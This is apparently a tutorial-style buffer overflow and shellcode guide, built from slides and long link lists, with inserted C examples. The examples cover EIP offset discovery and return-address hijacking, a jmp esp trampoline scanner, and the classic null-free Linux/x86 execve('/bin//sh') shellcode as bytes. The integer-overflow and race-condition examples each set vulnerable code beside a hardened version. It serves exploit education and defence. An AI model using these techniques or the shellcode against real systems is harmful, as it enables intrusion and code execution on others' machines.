Comprehensive Buffer Overflow Guide

The document provides information about buffer overflow exploits, shellcode development, reverse engineering, and Windows internals. It discusses stack-based buffer overflows, heap corruption, integer overflows, race conditions, and socket binding exploits. It also outlines the requirements and basic steps for developing exploits and differences between Windows and Linux exploits.

Uploaded by Oscar

Buffer Overflow Guide 1

Joas Antonio

[Link]
What is an Exploit?
• It is a piece of code written to take advantage of a specific security
flaw (vulnerability);
• An exploit typically consists of a shellcode (the payload) and the code
that delivers it into the vulnerable application;
What is Shellcode?
• Shellcode is a set of machine instructions that an exploit injects into a
process and then executes. It directly manipulates the registers and the
execution of the exploited process; its classic purpose is to obtain a shell
on the target machine, which is where the name comes from, although modern
shellcode often does something else entirely.
• In buffer overflow exploitation, shellcodes are the payloads used during
exploit development. Anyone who has analyzed a buffer overflow exploit has
seen them: shellcodes are built only from the hexadecimal values of the
opcodes of the target architecture, that is, the processor's own
instructions, so an understanding of assembly language, which to some extent
has a one-to-one relationship with machine language, is required. The
shellcode is the code that is actually executed when the buffer overflow is
exploited. They are called 'shellcodes' because the goal is usually to get a
shell.
Exploit Development and Buffer Overflow
Requirements
• Knowledge of the C language;
• Knowledge of the Python language;
• Knowledge of x86 and x64 assembly;
• Understanding of memory layout and address management;
• Knowledge of buffer overflows;
• Knowledge of reverse engineering;
• Knowledge of CPU registers;
• Concepts of software protection mechanisms (DEP, also called NX, and
ASLR);
• Fuzzing concepts;
Stack Based Buffer Overflow
• Stack-based buffer overflow exploits are likely the shiniest and
most common form of exploit for remotely taking over the code
execution of a process. These exploits were extremely common 20
years ago, but since then, a huge amount of effort has gone into
mitigating stack-based overflow attacks by operating system
developers, application developers, and hardware manufacturers,
with changes even being made to the standard libraries developers
use. Below, we will explore how stack-based overflows work and
detail the mitigation strategies that are put in place to try to
prevent them.
• [Link]
overflow-attacks-what-you-need-to-know/
Stack Based Buffer Overflow
The first thing that we need to do is send more data than the buffer can
handle, which overwrites the saved return address (EIP), as shown in the
following figure.

[Link]
2018/04/13/buffer-overflow-
exploit-part-3/
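As an added worked example (not part of the original slides), the C program below models the situation in the figure: a 32-bit frame whose local buffer is followed by the saved EBP and the saved return address. It sends a Metasploit-style cyclic pattern to find the exact offset at which EIP is overwritten, then builds a second payload that places a chosen address there. The frame is a struct and the copy is bounded to it so the program stays well-defined; the 64-byte buffer, the layout and the addresses are assumptions for illustration, and byte order follows the host (x86 little-endian in the test values).

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Model of a 32-bit x86 frame after the prologue: the local buffer sits
 * below the saved EBP, which sits below the saved return address (the
 * "EIP" the slide refers to).  Layout and sizes are assumptions for the
 * example; the overflow is bounded to this struct so the program stays
 * well-defined, whereas the real bug writes past it. */
struct frame32 {
    uint8_t  buf[64];      /* vulnerable local buffer          */
    uint32_t saved_ebp;    /* caller's frame pointer           */
    uint32_t saved_eip;    /* return address, popped by "ret"  */
};

/* Simulates an unbounded strcpy(buf, payload) into the frame above and
 * returns whatever ends up in the saved return address. */
uint32_t overflow_frame(const uint8_t *payload, size_t len)
{
    struct frame32 f;
    memset(&f, 0, sizeof f);
    f.saved_eip = 0x08048400u;          /* hypothetical legitimate return address */
    if (len > sizeof f)
        len = sizeof f;                 /* model boundary, not a real check */
    memcpy(&f, payload, len);           /* copy spills over ebp and eip */
    return f.saved_eip;
}

/* Metasploit-style cyclic pattern "Aa0Aa1Aa2...": every 4-byte window is
 * unique within the first 20280 bytes, so the value found in EIP after
 * the crash identifies its own offset. */
size_t cyclic_pattern(uint8_t *out, size_t len)
{
    size_t n = 0;
    for (char a = 'A'; a <= 'Z' && n < len; a++)
        for (char b = 'a'; b <= 'z' && n < len; b++)
            for (char c = '0'; c <= '9' && n < len; c++) {
                const char tri[3] = { a, b, c };
                for (int i = 0; i < 3 && n < len; i++)
                    out[n++] = (uint8_t)tri[i];
            }
    return n;
}

/* Given the value read out of EIP (as the register holds it), return the
 * offset of those 4 bytes inside the pattern, or -1. */
long pattern_offset(uint32_t eip, size_t pattern_len)
{
    uint8_t pat[20280];
    uint8_t needle[4];
    if (pattern_len > sizeof pat)
        pattern_len = sizeof pat;
    size_t n = cyclic_pattern(pat, pattern_len);
    memcpy(needle, &eip, 4);            /* register value -> memory byte order */
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Whole workflow: send the pattern, read EIP, recover the offset. */
long find_eip_offset(void)
{
    uint8_t pat[200];
    size_t n = cyclic_pattern(pat, sizeof pat);
    uint32_t eip = overflow_frame(pat, n);
    return pattern_offset(eip, n);
}

/* Second run: padding up to the offset, then the address we want EIP to
 * hold (a jmp esp or the start of the shellcode in a real exploit). */
uint32_t hijack_eip(uint32_t target)
{
    uint8_t payload[72];
    long off = find_eip_offset();
    if (off < 0 || (size_t)off + 4 > sizeof payload)
        return 0;
    memset(payload, 'A', (size_t)off);
    memcpy(payload + off, &target, 4);  /* same byte order the CPU pops */
    return overflow_frame(payload, sizeof payload);
}

int main(void)
{
    printf("EIP offset: %ld\n", find_eip_offset());
    printf("EIP after hijack: 0x%08x\n", hijack_eip(0xdeadbeefu));
    return 0;
}
```

The offset comes out as 64 bytes of buffer plus 4 bytes of saved EBP, which is the arithmetic a debugger session confirms when EIP reads back as the bytes "2Ac3" from the pattern.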
HEAP CORRUPTION EXPLOITS
• Heap corruption occurs when more data is written into a heap allocation
than it has room for, so the write spills into adjacent heap data and
allocator metadata;
• Heap memory is allocated dynamically by the application at run time
(malloc/free, new/delete);

[Link]
-based-buffer-overflow-in-
dlmalloc_fig1_244152148
Integer Overflow Attack
• Integer bugs are exploited by passing an oversized (or negative) integer
into an integer variable, so that the value wraps around or changes sign;
• Because the wrapped value is typically used as a length or size, a bounds
check passes and program control data is overwritten, resulting in
malicious code execution;
[Link]
c/defeating-integer-overflow-attack/
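As an added example (not from the original slides), the C code below shows the two classic shapes of the bug the slide describes, each beside its hardened check: a 32-bit length addition that wraps so an almost 4 GiB copy passes a "fits in 256 bytes" test, and a signed length that is negative when compared but huge when converted for memcpy. The message format, header size and buffer size are assumptions made for the example; the sample messages are constructed.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define HEADER_LEN 8u      /* bytes the parser writes before the body (assumed format) */
#define BUF_SIZE   256u    /* destination buffer size (assumed) */

/* Vulnerable length check. 'body_len' comes straight from the message. The
 * addition is done in 32 bits, so body_len = 0xFFFFFFFC gives total == 4,
 * which passes the check although the copy would be almost 4 GiB. */
int vulnerable_accepts(uint32_t body_len)
{
    uint32_t total = HEADER_LEN + body_len;      /* wraps around */
    return total <= BUF_SIZE;                    /* 1: copy would proceed */
}

/* Hardened check: detect the wrap before adding, then compare the untrusted
 * value against the room that is actually left. */
int hardened_accepts(uint32_t body_len)
{
    if (body_len > UINT32_MAX - HEADER_LEN)      /* HEADER_LEN + body_len would wrap */
        return 0;
    return body_len <= BUF_SIZE - HEADER_LEN;
}

/* Signed/unsigned variant: a negative length passes "len < size" and is
 * then converted to a huge size_t when handed to memcpy. */
int signed_check_accepts(int len)
{
    return len < (int)BUF_SIZE;                  /* -1 passes */
}

int signed_check_hardened(int len)
{
    return len >= 0 && (size_t)len < BUF_SIZE;
}

/* Parser for a constructed message format: 4-byte little-endian body
 * length followed by the body. Copies header + body into 'out' only after
 * the hardened check, so the overflow cannot occur. Returns the body length
 * copied, or -1 if the message is rejected. */
long parse_message(const uint8_t *msg, size_t msg_len, uint8_t out[BUF_SIZE])
{
    if (msg_len < 4)
        return -1;
    uint32_t body_len = (uint32_t)msg[0] | ((uint32_t)msg[1] << 8) |
                        ((uint32_t)msg[2] << 16) | ((uint32_t)msg[3] << 24);
    if (!hardened_accepts(body_len))
        return -1;
    if (body_len > msg_len - 4)                  /* claims more bytes than were sent */
        return -1;
    memset(out, 0, HEADER_LEN);                  /* stand-in for the real header */
    memcpy(out + HEADER_LEN, msg + 4, body_len);
    return (long)body_len;
}

/* Constructed inputs: one claiming 0xFFFFFFFC body bytes, one benign. */
long demo_malicious(void)
{
    uint8_t out[BUF_SIZE];
    const uint8_t msg[] = { 0xFC, 0xFF, 0xFF, 0xFF, 'A', 'B' };
    return parse_message(msg, sizeof msg, out);
}

long demo_benign(void)
{
    uint8_t out[BUF_SIZE];
    const uint8_t msg[] = { 0x03, 0x00, 0x00, 0x00, 'a', 'b', 'c' };
    return parse_message(msg, sizeof msg, out);
}

int main(void)
{
    printf("vulnerable check accepts 0xFFFFFFFC: %d\n", vulnerable_accepts(0xFFFFFFFCu));
    printf("hardened check accepts 0xFFFFFFFC:   %d\n", hardened_accepts(0xFFFFFFFCu));
    printf("malicious message: %ld, benign message: %ld\n", demo_malicious(), demo_benign());
    return 0;
}
```

The rule the hardened versions follow is to never add to an untrusted value before checking whether the addition can wrap, and to compare the untrusted value itself against the remaining space.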
Race Condition
• A race condition is a software vulnerability that occurs when multiple
accesses to a shared resource are not properly controlled;
• Types of Race Condition Attacks:
• File race condition: occurs when the attacker exploits a non-atomic
check-then-use sequence, timing the creation, writing, reading or deletion
of a file in a temporary directory so that it happens between the check and
the use;
• Signal race condition: signal-handling race conditions can occur whenever
an installed function such as a signal handler is not reentrant, which means
it keeps some internal state or calls another function that does;
[Link]
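As an added example for the file race condition (not from the original slides), the C program below puts the vulnerable access()-then-open() sequence beside a hardened version that opens once with O_NOFOLLOW and verifies the opened descriptor with fstat(). The race window itself cannot be reproduced deterministically, so the demonstration stands in for the attacker's swap by pointing a symlink at a constructed file under /tmp: the vulnerable open follows it, the hardened one refuses. The file names, the /tmp location and the "regular file with one link" policy are assumptions for the example.

```c
#define _DEFAULT_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Vulnerable check-then-use: a privileged program tests the *name* with
 * access() and later opens the *name* again. In the window between the two
 * calls an attacker who controls the directory (e.g. /tmp) can replace the
 * file with a symlink to something they are not allowed to read. */
int vulnerable_open(const char *path)
{
    if (access(path, R_OK) != 0)          /* check, by path */
        return -1;
    /* ... the attacker swaps 'path' for a symlink here ... */
    return open(path, O_RDONLY);          /* use, by path again */
}

/* Hardened: open exactly once, refuse to follow a symlink in the final
 * component, and verify what was opened on the descriptor with fstat(),
 * so no name lookup happens between the check and the use. */
int hardened_open(const char *path)
{
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Demonstration on constructed files under /tmp: a regular file and a
 * symlink pointing at it, which stands in for the attacker's swap.
 * Returns 1 if vulnerable_open() goes through the link while
 * hardened_open() refuses it but still opens the real file; 0 if not;
 * -1 if the files could not be created. */
int demo_symlink_swap(void)
{
    char target[] = "/tmp/toctou_target_XXXXXX";
    char lnk[]    = "/tmp/toctou_link_XXXXXX";
    int tfd = mkstemp(target);
    if (tfd < 0)
        return -1;
    close(tfd);
    int lfd = mkstemp(lnk);                /* reserve a unique name ... */
    if (lfd < 0) { unlink(target); return -1; }
    close(lfd);
    unlink(lnk);                           /* ... then reuse it for the symlink */
    if (symlink(target, lnk) != 0) { unlink(target); return -1; }

    int v = vulnerable_open(lnk);          /* follows the link: succeeds */
    int h = hardened_open(lnk);            /* O_NOFOLLOW: fails (ELOOP) */
    int r = hardened_open(target);         /* real file: still works */
    int ok = v >= 0 && h < 0 && r >= 0;
    if (v >= 0) close(v);
    if (h >= 0) close(h);
    if (r >= 0) close(r);
    unlink(lnk);
    unlink(target);
    return ok;
}

int main(void)
{
    printf("vulnerable follows symlink, hardened refuses: %d\n", demo_symlink_swap());
    return 0;
}
```

The point of the hardened version is that every decision is made on the file descriptor rather than on the path name, so whatever the attacker does to the directory after open() returns no longer matters.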
Socket Binding Exploits
• Client-side socket: code that connects the application to a remote server
(socket, connect);
• Server-side socket: code that listens on a port and processes incoming
connections (socket, bind, listen, accept);
[Link]
[Link]
[Link]
[Link]
inteledison/
[Link]
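As an added example (not from the original slides), the C program below implements both sides the slide lists and runs them against each other in one process over 127.0.0.1: the server side binds, listens and accepts; the client side connects. A loopback connect() completes against the listen backlog, so no thread is needed. The server only echoes a constructed request; the comment marks the point where a port-binding shellcode would instead dup2() the accepted socket onto stdin/stdout/stderr and execve() a shell. The kernel-chosen port and the request bytes are assumptions of the example.

```c
#define _DEFAULT_SOURCE
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

/* Server-side socket: bind to 127.0.0.1 on a kernel-chosen port, listen,
 * and report the port. Returns the listening descriptor or -1. */
int server_listen(uint16_t *port_out)
{
    int ls = socket(AF_INET, SOCK_STREAM, 0);
    if (ls < 0)
        return -1;
    struct sockaddr_in a;
    memset(&a, 0, sizeof a);
    a.sin_family = AF_INET;
    a.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    a.sin_port = htons(0);                 /* 0: let the kernel pick a free port */
    socklen_t alen = sizeof a;
    if (bind(ls, (struct sockaddr *)&a, alen) < 0 || listen(ls, 1) < 0 ||
        getsockname(ls, (struct sockaddr *)&a, &alen) < 0) {
        close(ls);
        return -1;
    }
    *port_out = ntohs(a.sin_port);
    return ls;
}

/* Client-side socket: connect to the given loopback port. */
int client_connect(uint16_t port)
{
    int c = socket(AF_INET, SOCK_STREAM, 0);
    if (c < 0)
        return -1;
    struct sockaddr_in a;
    memset(&a, 0, sizeof a);
    a.sin_family = AF_INET;
    a.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    a.sin_port = htons(port);
    if (connect(c, (struct sockaddr *)&a, sizeof a) < 0) {
        close(c);
        return -1;
    }
    return c;
}

/* Both halves in one process: a loopback connect() completes against the
 * listen backlog without another thread, so accept() returns immediately.
 * The server echoes one constructed request; returns 1 on a full round trip. */
int demo_exchange(void)
{
    uint16_t port;
    int ls = server_listen(&port);
    if (ls < 0)
        return 0;
    int c = client_connect(port);
    int s = (c < 0) ? -1 : accept(ls, NULL, NULL);
    int ok = 0;
    if (s >= 0) {
        const char req[] = "id\n";         /* constructed client request */
        char buf[64];
        ssize_t n;
        if (send(c, req, sizeof req - 1, 0) == (ssize_t)(sizeof req - 1) &&
            (n = recv(s, buf, sizeof buf, 0)) > 0) {
            /* a port-binding shellcode would now dup2() 's' onto fd 0/1/2 and
             * execve() a shell; this server just echoes the bytes back */
            if (send(s, buf, (size_t)n, 0) == n) {
                ssize_t m = recv(c, buf, sizeof buf, 0);
                ok = (m == n) && memcmp(buf, req, (size_t)m) == 0;
            }
        }
        close(s);
    }
    if (c >= 0) close(c);
    close(ls);
    return ok;
}

int main(void)
{
    printf("loopback client/server round trip: %d\n", demo_exchange());
    return 0;
}
```

The same socket/bind/listen/accept sequence, written in assembly with the socketcall or direct socket syscalls, is what a port-binding shellcode consists of; a reverse-connect shellcode uses the client half instead.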
Basic step-by-step development of an exploit
1. Identify and analyze the application bug;
2. Write code to manipulate and control the target's memory;
3. Redirect the execution flow;
4. Inject the shellcode;
5. Encrypt your socket communication;
Differences between Exploits on Windows and Linux
Windows:
• Exploits call functions exported by dynamic-link libraries (DLLs);
• Exploits written for Windows overwrite the saved return address on the
stack with the address of a "jmp reg" instruction, where reg is a register
that points at attacker-controlled data;
Linux:
• Linux exploits use system calls directly;
• Exploits overwrite the saved return address with a stack address where
user-supplied data can be found;
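As an added example (not from the original slides) of the Windows technique, the C code below scans a module image for a "jmp reg" trampoline and its equivalents ("call reg", "push reg; ret"), the way tools such as mona or findjmp do against a loaded DLL, and then checks that the resulting address contains no null byte so it survives a string copy. The 32-byte "module" is a constructed byte buffer, not a real DLL, and the load base 0x7C801000 is hypothetical.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* x86 encodings of the "jmp reg" trampoline and its equivalents:
 *   jmp  r32      -> FF E0+r      call r32 -> FF D0+r
 *   push r32; ret -> 50+r C3
 * with r = eax 0, ecx 1, edx 2, ebx 3, esp 4, ebp 5, esi 6, edi 7.
 * Each transfers control to wherever the register points; after a stack
 * overflow ESP usually points at the attacker's data, hence "jmp esp". */
static const char *const reg_names[8] =
    { "eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi" };

/* Returns the register number if the two bytes at p are jmp/call reg or
 * push reg; ret, else -1. */
int decode_trampoline(const uint8_t *p)
{
    if (p[0] == 0xFF && (p[1] & 0xF8) == 0xE0) return p[1] & 7;  /* jmp reg  */
    if (p[0] == 0xFF && (p[1] & 0xF8) == 0xD0) return p[1] & 7;  /* call reg */
    if ((p[0] & 0xF8) == 0x50 && p[1] == 0xC3) return p[0] & 7;  /* push reg; ret */
    return -1;
}

/* Scans a module image for the first trampoline through 'reg' and returns
 * its offset (-1 if none). base + offset is the value the exploit writes
 * over the saved return address. */
long find_jmp_reg(const uint8_t *image, size_t len, int reg)
{
    for (size_t i = 0; i + 2 <= len; i++)
        if (decode_trampoline(image + i) == reg)
            return (long)i;
    return -1;
}

/* Addresses delivered through strcpy-like copies must not contain 0x00. */
int addr_has_null(uint32_t addr)
{
    for (int i = 0; i < 4; i++)
        if (((addr >> (8 * i)) & 0xFF) == 0)
            return 1;
    return 0;
}

/* Constructed 32-byte "module" (not a real DLL) with a call eax at 0x10,
 * a jmp esp at 0x1A and a push esp; ret at 0x1E. */
static const uint8_t sample_image[] = {
    0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x10, 0x33, 0xC0, 0xC9, 0xC3, /* 0x00: push ebp; mov ebp,esp; sub esp,0x10; xor eax,eax; leave; ret */
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90,                         /* 0x0A: nops */
    0xFF, 0xD0,                                                 /* 0x10: call eax */
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,             /* 0x12: nops */
    0xFF, 0xE4,                                                 /* 0x1A: jmp esp */
    0xC3, 0x90,                                                 /* 0x1C: ret; nop */
    0x54, 0xC3                                                  /* 0x1E: push esp; ret */
};

long demo_find_jmp_esp(void)
{
    return find_jmp_reg(sample_image, sizeof sample_image, 4);
}

/* Hypothetical load base for the module; returns the value to place in
 * EIP, or 0 if no usable (null-free) trampoline exists at that base. */
uint32_t demo_return_address(uint32_t base)
{
    long off = demo_find_jmp_esp();
    if (off < 0 || addr_has_null(base + (uint32_t)off))
        return 0;
    return base + (uint32_t)off;
}

int main(void)
{
    long off = demo_find_jmp_esp();
    printf("jmp %s at offset 0x%lx, EIP value 0x%08x\n",
           reg_names[4], off, demo_return_address(0x7C801000u));
    return 0;
}
```

In a real exploit the module is chosen so that its base is stable (no ASLR or rebasing) and the address avoids bad characters for the input path; the scan itself is identical.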
Types of Shellcode
• Shellcodes are sets of instructions used by exploit programs to perform the desired function;
• They run after a vulnerability is exploited;
• They are raw machine instructions placed directly at the desired memory location;
• These machine instructions consist of opcodes;
Remote Shellcode:
• Port Binding Shellcode
• Socket Descriptor Reuse Shellcode
Local Shellcode:
• execve shellcode
• setuid shellcode
• chroot shellcode
• Windows shellcode
Shellcode Development
• Write the code in assembly language, or in C and then disassemble it;
• Collect the arguments and the syscall number;
• Convert the assembly code into opcodes;
• Eliminate null bytes;
• Start a shell;
• Compile and run;
• Trace the code;
• Inject the shellcode at program startup;
[Link] shellcode-e-explorando-uma-dos-
santos/
[Link]
[Link]
Shellcode Development Problems
• Address problem (locating where the shellcode lands in memory);
• Null bytes problem;
• Implementation of system calls;
• [Link]
problem
• [Link]
returnaddress-for-shellcode
• [Link]
removingnull-bytes-0161591/
• [Link]
• [Link]
• [Link]
• [Link]
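As an added example covering both the development steps above ("collect the syscall number, convert to opcodes, eliminate null bytes") and the null bytes problem listed here, the C code below holds the two encodings of "EAX = 11 (execve)" and the classic 23-byte null-free Linux/x86 execve("/bin//sh") shellcode as byte arrays; it does not execute them. It checks for null bytes, models how a strcpy-style delivery truncates at the first null, and decodes the two push instructions to recover the path the shellcode would exec. The functions and the truncation model are this example's own, not from the original slides.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* "Convert assembly into opcodes" for the execve syscall number (11) on
 * 32-bit Linux, two ways:
 *   mov eax, 11    -> B8 0B 00 00 00   (three null bytes)
 *   xor eax, eax   -> 31 C0
 *   mov al, 11     -> B0 0B            (null-free, same result in EAX) */
static const uint8_t mov_eax_11[]        = { 0xB8, 0x0B, 0x00, 0x00, 0x00 };
static const uint8_t xor_eax_mov_al_11[] = { 0x31, 0xC0, 0xB0, 0x0B };

/* The classic 23-byte null-free Linux/x86 execve("/bin//sh") shellcode.
 * "/bin//sh" is 8 bytes so it fits two 4-byte pushes with no padding
 * null; the NUL terminator and the NULL envp come from pushing EAX=0. */
static const uint8_t execve_sh[] = {
    0x31, 0xC0,                   /* xor eax, eax                */
    0x50,                         /* push eax   (string NUL)     */
    0x68, 0x2F, 0x2F, 0x73, 0x68, /* push "//sh"                 */
    0x68, 0x2F, 0x62, 0x69, 0x6E, /* push "/bin"                 */
    0x89, 0xE3,                   /* mov ebx, esp   (pathname)   */
    0x50,                         /* push eax   (envp = NULL)    */
    0x53,                         /* push ebx   (argv[0])        */
    0x89, 0xE1,                   /* mov ecx, esp   (argv)       */
    0xB0, 0x0B,                   /* mov al, 11     (execve)     */
    0xCD, 0x80                    /* int 0x80                    */
};

/* Index of the first null byte in a shellcode, or -1 if it is null-free. */
long first_null(const uint8_t *sc, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (sc[i] == 0)
            return (long)i;
    return -1;
}

/* Models delivery through a C-string function (strcpy, sprintf, gets):
 * the copy stops at the first null, so only that prefix reaches the
 * target buffer. Returns the number of bytes that would be delivered. */
size_t delivered_by_strcpy(const uint8_t *sc, size_t len)
{
    size_t n = 0;
    while (n < len && sc[n] != 0)
        n++;
    return n;
}

/* Reverses the "push imm32" sequence to recover the string the shellcode
 * builds on the stack: pushes run from the end of the string backwards,
 * so the last push holds the first four characters. Returns the length. */
size_t pushed_string(const uint8_t *sc, size_t len, char *out, size_t outsz)
{
    uint8_t imm[4][4];
    size_t npush = 0, n = 0;
    for (size_t i = 0; i + 5 <= len && npush < 4; i++) {
        if (sc[i] == 0x68) {                 /* push imm32 */
            memcpy(imm[npush++], sc + i + 1, 4);
            i += 4;                          /* skip the immediate */
        }
    }
    while (npush > 0 && n + 4 < outsz) {
        memcpy(out + n, imm[--npush], 4);
        n += 4;
    }
    out[n] = '\0';
    return n;
}

/* Does the shellcode build 'expected' as its pathname? */
int execs_path(const uint8_t *sc, size_t len, const char *expected)
{
    char path[17];
    pushed_string(sc, len, path, sizeof path);
    return strcmp(path, expected) == 0;
}

int main(void)
{
    printf("mov eax,11: first null at %ld, strcpy delivers %zu of %zu bytes\n",
           first_null(mov_eax_11, sizeof mov_eax_11),
           delivered_by_strcpy(mov_eax_11, sizeof mov_eax_11), sizeof mov_eax_11);
    printf("execve shellcode: null-free=%d, execs /bin//sh=%d\n",
           first_null(execve_sh, sizeof execve_sh) == -1,
           execs_path(execve_sh, sizeof execve_sh, "/bin//sh"));
    return 0;
}
```

The same two ideas, using 8-bit or 16-bit sub-register moves instead of 32-bit immediates and padding strings to a multiple of four so no immediate needs a zero byte, remove most null bytes from hand-written shellcode; the remainder are usually handled by an encoder.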
Assembly Basics
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
Arquitetura/dp/8575226673
• [Link]
• [Link]
• [Link]
Reverse Engineering
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
tutorials/tutorial-15-using-the-call-stack/
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
Reverse Engineering #2
• [Link]
• [Link]
concepts-f88b233c63b7
• [Link]
intermediate-guide-links-f64c207505ed
• [Link]
• [Link]
• [Link]
programming-concepts-b4e292b2f3e
• [Link]
• [Link]
• [Link]
• [Link]
Reversing__Secrets_of_Reverse_Engineering-Wiley(2005).pdf
Windows Internals
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
review7001bfdf335e
• [Link]
• [Link]
Buffer Overflow
• [Link]
• [Link]
• [Link]
• [Link] FaoNhzC9bRw6&ab_channel=Vin%C3%ADciusVieira
• [Link] o
• [Link]
• [Link]
• [Link]
4dcae8fa2630
• [Link]
Buffer Overflow 2
• [Link]
vulnerability-760f23c21ebb
• [Link]
• [Link]
• [Link]
5f15c0d5b5c1
• [Link]
E143ff3473c
• [Link]
• [Link]
• [Link]
• [Link]
Buffer Overflow 3
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
Buffer Overflow 4
• [Link]
• [Link]
overflow-vulnerability/
• [Link] First,order%20they%20have%20been%20entered
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
Buffer Overflow 5
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link] 0security%20vulnerability.
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
Dev Exploit
• [Link]
• [Link]
• [Link]
• [Link]
tutorial-part-3-seh/
• [Link]
• [Link]
• [Link]
overflows
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
Dev Exploit 2
• [Link]
part-8-win32-egg-hunting/
• [Link]
• [Link]
[Link]
• [Link]
exploit-cve-2012-0124/
• [Link]
• [Link]
[Link]
Shellcode Dev
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
system
• [Link]
• [Link]
• [Link]
Shellcode Dev 2
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
08/Miller/BH_US_08_Ty_Miller_Reverse_DNS_Tunneling_Shellcode.pdf
• [Link]
executing-shellcode-from-portable-executable-resources
• [Link]
• [Link]
detector_fig1_274570378
• [Link]
Shellcode Dev 3
• [Link]
• [Link]
• [Link]
securitytube-linux-assembly-expert-32-bit-exercise-4-568c5a18149a
• [Link]
• [Link]
• [Link]
31816e767611
• [Link]
decoder/
• [Link]
• [Link]
Debuggers
• [Link]
conhe%C3%A7a-o-gef-r331/
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
2/Using%20Immunity%20Debugger%20to%20Write%[Link]
• [Link]
immunity-debugger-3
Extra Resources
• [Link]
• [Link]
development-part1
• [Link]
• [Link] ng
• [Link]
• [Link]
• [Link] MYz61RcwSCoVO8 (Assembly)
• [Link] QxcNVkmJLGQwyKE
Extra Resources 2
• [Link]
xMs&list=PLIfZMtpPYFP6_YOrfX79YX79I5V6mS0ci
• [Link]
• [Link]
everything-you-need-know-0167801/
• [Link]
• [Link]
• [Link]
